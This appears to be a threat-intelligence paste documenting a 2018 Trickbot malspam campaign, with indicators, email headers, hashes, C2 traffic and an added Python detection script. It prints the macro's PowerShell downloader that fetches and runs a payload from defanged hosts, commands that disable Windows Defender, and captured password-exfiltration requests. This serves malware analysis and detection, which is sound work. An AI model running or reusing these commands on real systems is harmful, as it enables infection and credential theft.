#Trickbot_051018

VRad Oct 5th, 2018 (edited)
#IOC #OptiData #VR #Trickbot #W97M #macro #powershell

https://pastebin.com/75KNqwCf
https://radetskiy.wordpress.com/?s=trickbot
https://myonlinesecurity.co.uk/trickbot-via-new-fax-message-malspam/

schema
--------------
email > attach (doc) > macro > powershell > GET 2URL > \AppData\Local\Temp\which.exe

email_headers
--------------
Received: from confidentialfax.com ([95.211.242.199])
    by mail1.victim.com for <user1@org1.victim.com>;
    Fri, 5 Oct 2018 13:45:12 +0300 (EEST) (envelope-from noreply-user1=org1.victim.com@confidentialfax.com)
Received: by confidentialfax.com id hmt0jtcpsj86 for <user1@org1.victim.com>;
    Fri, 5 Oct 2018 06:29:00 -0400 (envelope-from <noreply-user1=org1.victim.com@confidentialfax.com>)
Subject: New fax message
From: "Confidential Fax" <noreply@confidentialfax.com>
Date: Fri, 5 Oct 2018 06:29:00 -0400
To: user1@org1.victim.com

files
--------------
SHA-256 03456acb1cd591086282e3356a2978cb95de1ed5d17c00ce982e391c92efdbd2
File name   Fax.doc
File size   63 KB

SHA-256 b769c3aff961c8a3db3884d5470560d1ba23f1d4d7ff062c899fca1d3829c30a
File name   ch.rome     !This program cannot be run in DOS mode.
File size   557.3 KB

SHA-256 6b58797cbdbe8afc9a93230bd8275202d88c94c10aa051721908ec31deea9c8c
File name   radiance.png    !This program cannot be run in DOS mode.
File size   492 KB

SHA-256 3558a4b7210b316afcd175c072b11bed5662296082b3d5c0a8b82c4d9a393f22
File name   table.png   !This program cannot be run in DOS mode.
File size   492 KB

macro
--------------
powershell "'powershell ""function need([string] $qqqqq){(new-object system.net.webclient).downloadfile($qqqqq,''C:\Users\admin\AppData\Local\Temp\which.exe'');start-process ''C:\Users\admin\AppData\Local\Temp\which.exe'';}try{need(''h11p: \pixandflix{.} com/ch.rome'')}catch{need(''h11p: \wedannouncements{.} com/ch.rome'')}'"" | out-file -encoding ascii -filepath C:\Users\admin\AppData\Local\Temp\symbol.bat; start-process 'C:\Users\admin\AppData\Local\Temp\symbol.bat' -windowstyle hidden"

payload_sources
--------------
107.180.51.22   pixandflix{.} com/ch.rome
107.180.51.22   wedannouncements{.} com/ch.rome

activity
**************

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\cmd.exe /c powershell "'powershell ""function need([string] $qqqqq){(new-object system.net.webclient).downloadfile($qqqqq,''%tmp%\which.exe'');start-process ''%tmp%\which.exe'';}try{need(''h11p: \pixandflix{.} com/ch.rome'')}catch{need(''h11p: \wedannouncements{.} com/ch.rome'')}'"" | out-file -encoding ascii -filepath %tmp%\symbol.bat; start-process '%tmp%\symbol.bat' -windowstyle hidden"
C:\Windows\SysWOW64\cmd.exe /c ""C:\tmp\symbol.bat" "
"C:\tmp\which.exe"
C:\Windows\SysWOW64\cmd.exe
/c sc stop WinDefend
/c sc delete WinDefend
/c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Users\operator\AppData\Roaming\AMNI\which.exe
C:\Windows\SysWOW64\cmd.exe
/c sc stop WinDefend
/c sc delete WinDefend
/c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\svchost.exe
C:\Windows\system32\cmd.exe
/c ipconfig /all
/c net config workstation
/c net view /all
/c net view /all /domain
/c nltest /domain_trusts
/c nltest /domain_trusts /all_trusts
C:\Windows\system32\svchost.exe

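Detection logic for the process chain listed above, added here as an example and not part of the original paste: it replays the proc section as constructed events (field names parent/image/cmdline are assumptions) and flags the Office-spawned PowerShell downloader that writes a .bat, the WinDefend tampering, and the net view/nltest discovery burst.

```python
"""Added detection example (not the paste author's code). Events are
constructed from the 'proc' section; the parent/image/cmdline field
names are an assumed EDR-style schema."""
import re

# Constructed sample events modelled on the proc section (parent -> child).
EVENTS = [
    {"parent": "WINWORD.EXE", "image": "cmd.exe",
     "cmdline": ("cmd.exe /c powershell \"'powershell \"\"function need([string] $q)"
                 "{(new-object system.net.webclient).downloadfile($q,''%tmp%\\which.exe'');"
                 "start-process ''%tmp%\\which.exe'';}'\"\" | out-file -encoding ascii "
                 "-filepath %tmp%\\symbol.bat; start-process '%tmp%\\symbol.bat' -windowstyle hidden\"")},
    {"parent": "which.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c sc stop WinDefend"},
    {"parent": "which.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c sc delete WinDefend"},
    {"parent": "which.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"parent": "svchost.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c ipconfig /all"},
    {"parent": "svchost.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c net view /all /domain"},
    {"parent": "svchost.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c nltest /domain_trusts /all_trusts"},
    # Benign control: a single ipconfig from an interactive shell should not alert.
    {"parent": "explorer.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c ipconfig /all"},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# WebClient.DownloadFile piped through Out-File into a .bat, as in the macro.
DOWNLOADER = re.compile(r"downloadfile\(.*out-file.*\.bat", re.I | re.S)
# Defender service removal and real-time protection switch-off.
DEFENDER_TAMPER = re.compile(
    r"sc\s+(stop|delete)\s+WinDefend|Set-MpPreference\s+-DisableRealtimeMonitoring", re.I)
# Domain/network discovery commands seen after the second-stage download.
DISCOVERY = re.compile(r"\b(net\s+view|net\s+config\s+workstation|nltest\s+/domain_trusts)", re.I)


def detect(events, discovery_threshold=2):
    """Return (rule_name, detail) findings for the given process events."""
    findings = []
    discovery_by_parent = {}
    for ev in events:
        parent, image, cmd = ev["parent"].lower(), ev["image"].lower(), ev["cmdline"]
        if parent in OFFICE and image in SHELLS and DOWNLOADER.search(cmd):
            findings.append(("office_macro_downloader", cmd[:60]))
        if DEFENDER_TAMPER.search(cmd):
            findings.append(("defender_tamper", cmd))
        if DISCOVERY.search(cmd):
            discovery_by_parent[parent] = discovery_by_parent.get(parent, 0) + 1
    # One net view is routine; several discovery commands from one parent is a burst.
    for parent, n in discovery_by_parent.items():
        if n >= discovery_threshold:
            findings.append(("domain_discovery_burst", f"{parent} ran {n} discovery commands"))
    return findings
```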
netwrk
--------------
107.180.51.22   pixandflix.com  GET /ch.rome        HTTP/1.1    no User Agent       !This program cannot be run in DOS mode.
185.17.123.2    185.17.123.2    GET /radiance.png   HTTP/1.1    no User Agent       !This program cannot be run in DOS mode.
185.17.123.2    185.17.123.2    GET /table.png      HTTP/1.1    WinHTTP loader/1.0  !This program cannot be run in DOS mode.
185.17.123.2    185.17.123.2    GET /table.png      HTTP/1.1    WinHTTP loader/1.0  !This program cannot be run in DOS mode.
37.128.229.30   37.128.229.30   POST /ser1005/APM11_W617601.idxxxxxx/81/    HTTP/1.1    Mozilla/4.0
37.128.229.30   37.128.229.30   POST /ser1005/APM11_W617601.idxxxxxx/81/    HTTP/1.1    Mozilla/4.0
37.128.229.30   37.128.229.30   POST /ser1005/APM11_W617601.idxxxxxx/90     HTTP/1.1    test
37.128.229.30   37.128.229.30   POST /ser1005/APM11_W617601.idxxxxxx/81/    HTTP/1.1    Mozilla/4.0

comp
--------------
powershell.exe  1568    107.180.51.22   80      ESTABLISHED
svchost.exe     2976    47.52.62.55     443     ESTABLISHED
svchost.exe     2976    192.252.209.44  443     ESTABLISHED
svchost.exe     2976    2.21.89.57      80      ESTABLISHED
svchost.exe     2976    82.146.41.218   447     ESTABLISHED
svchost.exe     3136    200.29.24.36    8082    SYN_SENT
svchost.exe     3384    185.17.123.2    80      ESTABLISHED
svchost.exe     3136    24.130.135.200  80      SYN_SENT
svchost.exe     420     77.37.142.203   8082    SYN_SENT
svchost.exe     3136    177.0.69.68     80      SYN_SENT
svchost.exe     3136    107.175.247.166 443     SYN_SENT
svchost.exe     3136    172.81.135.139  443     SYN_SENT
svchost.exe     3136    200.29.24.36    8082    SYN_SENT

persist
--------------
Task Scheduler
\Msnetcs            c:\users\operator\appdata\roaming\amni\which.exe    05.10.2018 10:59

stealing_passwd
**************
POST /ser1005/APM11_W617601.idxxxxxx/81/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0
Host: 37.128.229.30
-----------DEAFJJDLMELQCBHP
Content-Disposition: form-data; name="data"

http://www.i.ua|oper|****** (saved passwd)
https://www.ukr.net|11oper|****** (saved passwd)
https://accounts.google.com|oper11.wdma@gmail.com|****** (saved passwd)
https://login.live.com|oper11.wdma@gmail.com|****** (saved passwd)

-----------DEAFJJDLMELQCBHP
Content-Disposition: form-data; name="source"

firefox passwords
-----------DEAFJJDLMELQCBHP--

(!) ff only, no chrome

get_sys_info
**************
POST /ser1005/APM11_W617601.595544C8808D034FD9E85B5C4F5C2BEB/90 HTTP/1.1
Content-Type: multipart/form-data; boundary=Arasfjasu7
User-Agent: test
Host: 37.128.229.30

--Arasfjasu7
Content-Disposition: form-data; name="proclist"

        ***PROCESS LIST***

[System Process]
System
smss.exe
csrss.exe
wininit.exe
csrss.exe
winlogon.exe
. . .

--Arasfjasu7
Content-Disposition: form-data; name="sysinfo"

        ***SYSTEMINFO***

Host Name - APM11
OS Name - Microsoft Windows 7 ..........................
OS Version - Service Pack 1
OS Architecture - 64-bit
Product Type - Workstation
Build Type - Multiprocessor Free
Registered Owner - operator
Registered Organization -
. . .
/c ipconfig /all
/c net config workstation
/c net view /all
/c net view /all /domain
/c nltest /domain_trusts
/c nltest /domain_trusts /all_trusts

# # #
https://www.virustotal.com/#/file/03456acb1cd591086282e3356a2978cb95de1ed5d17c00ce982e391c92efdbd2/community
https://www.virustotal.com/#/file/b769c3aff961c8a3db3884d5470560d1ba23f1d4d7ff062c899fca1d3829c30a/community
https://www.virustotal.com/#/file/6b58797cbdbe8afc9a93230bd8275202d88c94c10aa051721908ec31deea9c8c/detection
https://www.virustotal.com/#/file/3558a4b7210b316afcd175c072b11bed5662296082b3d5c0a8b82c4d9a393f22/detection
https://analyze.intezer.com/#/analyses/0a02c369-9b18-4711-ba78-cb38aaed2184
https://analyze.intezer.com/#/analyses/d2aea4cc-8c6c-4f60-80e1-e946b5f14f64
https://analyze.intezer.com/#/analyses/7f767ab6-9865-441e-a9de-9bdd7c4c6bff